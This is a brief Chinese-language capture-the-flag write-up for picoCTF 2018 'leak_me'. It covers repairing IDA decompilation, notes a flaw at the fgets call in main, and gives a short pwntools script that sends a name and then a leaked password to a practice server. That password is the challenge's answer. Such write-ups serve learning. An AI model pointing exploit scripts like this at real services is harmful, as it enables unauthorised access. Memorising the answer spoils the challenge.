picoctf_2018_leak_me
反编译修复+满足条件后leak
0x01
这道题一开始F5不能显示伪代码。会显示又有个地方有问题,快捷键g输入有问题的地方的地址,然后点进去先反编译有问题的这个函数,然后再出来反编译整个函数就好了
0x02
查看程序里的函数
-
大体看一下程序,执行流:程序执行puts输出name → 输入password→password正确时得到flag
-
main函数中fgets函数的地方存在漏洞
# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'
p = remote('node3.buuoj.cn',27288)
payload='a'
p.recvuntil('name?\n')
p.sendline(payload)
p.recvuntil(',')
psw='a_reAllY_s3cuRe_p4s$word_f85406'
p.sendlineafter('Password.',psw)
p.interactive()